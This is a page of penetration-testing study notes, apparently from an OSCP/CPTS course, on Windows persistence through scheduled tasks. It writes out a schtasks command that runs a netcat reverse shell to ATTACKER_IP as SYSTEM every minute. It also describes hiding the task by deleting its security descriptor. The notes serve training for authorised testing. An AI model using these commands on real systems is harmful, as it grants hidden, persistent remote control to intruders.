OSCP-CPTS NOTES
TwitterGithubLinkedinInstagramDiscord
  • oscp-cpts-notes
  • Pivoting & Tunneling
    • Local Port Forwarding
    • Remote Port Forwarding
    • Dynamic Port Forwarding
    • Ligolo-ng
  • Linux Privilege Escalation
    • Gathering Information of the System
    • Capabilities
    • Group Based
    • SUID Privilege Escalation
    • Cron Job
    • Exploiting NFS weak Permission
    • Sudo + LD_PRELOAD (Shared Libraries)
    • Shared Object Manipulation
    • Python Library Hijacking
  • Windows Privilege Escalation
    • Gathering Information of the System
    • User Privileges
      • SeImpersonatePrivilege and SeAssignPrimaryToken
      • SeDebugPrivilege
      • SeTakeOwnershipPrivilege
    • Group Privileges
      • Backup Operators
      • DnsAdmins
      • Server Operators
      • Always Install Elevated
      • Print Operators
      • Event Log Readers
      • Hyper-V Administrators
    • Credential Theft
  • Active Directory Attacks
    • Enumeration
    • Initial Foothold
    • Gathering Users & Password Policies
    • Password Spraying
    • Credentialed Enumeration From Linux
    • Credentialed Enumeration From Windows
    • Kerberoasting - From Linux
    • Kerberoasting - From Windows
  • Beyond OSCP - CPTS
    • RED TEAMING
      • Windows Local Persistence
        • Tampering With Unprivileged Accounts
        • Backdooring Files
        • Abusing Services
        • Abusing Scheduled Tasks
        • Logon Triggered Persistence
        • Backdooring the Login Screen / RDP
        • Persisting Through Existing Services
Powered by GitBook
On this page

Was this helpful?

Edit on GitHub
  1. Beyond OSCP - CPTS
  2. RED TEAMING
  3. Windows Local Persistence

Abusing Scheduled Tasks

PreviousAbusing ServicesNextLogon Triggered Persistence

Last updated 2 months ago

Was this helpful?

The most common way to schedule tasks is using the built-in Windows task scheduler.

Lets create a task that executes reverse shelle very single minute.

C:\> schtasks /create /sc minute /mo 1 /tn THM-TaskBackdoor /tr "c:\tools\nc64 -e cmd.exe ATTACKER_IP 4449" /ru SYSTEM
SUCCESS: The scheduled task "THM-TaskBackdoor" has successfully been created.
C:\> schtasks /query /tn thm-taskbackdoor

Folder: \
TaskName                                 Next Run Time          Status
======================================== ====================== ===============
thm-taskbackdoor                         5/25/2022 8:08:00 AM   Ready

Making Our Task Invisible

To hide our schedules task, we can delete its SD (Security Descriptor). SD is a simply an ACL that states which users have access to scheduled task. By delting SD we are disallowing all users acc to the scheduled task, including administrators.

C:\> schtasks /query /tn thm-taskbackdoor 
ERROR: The system cannot find the file specified.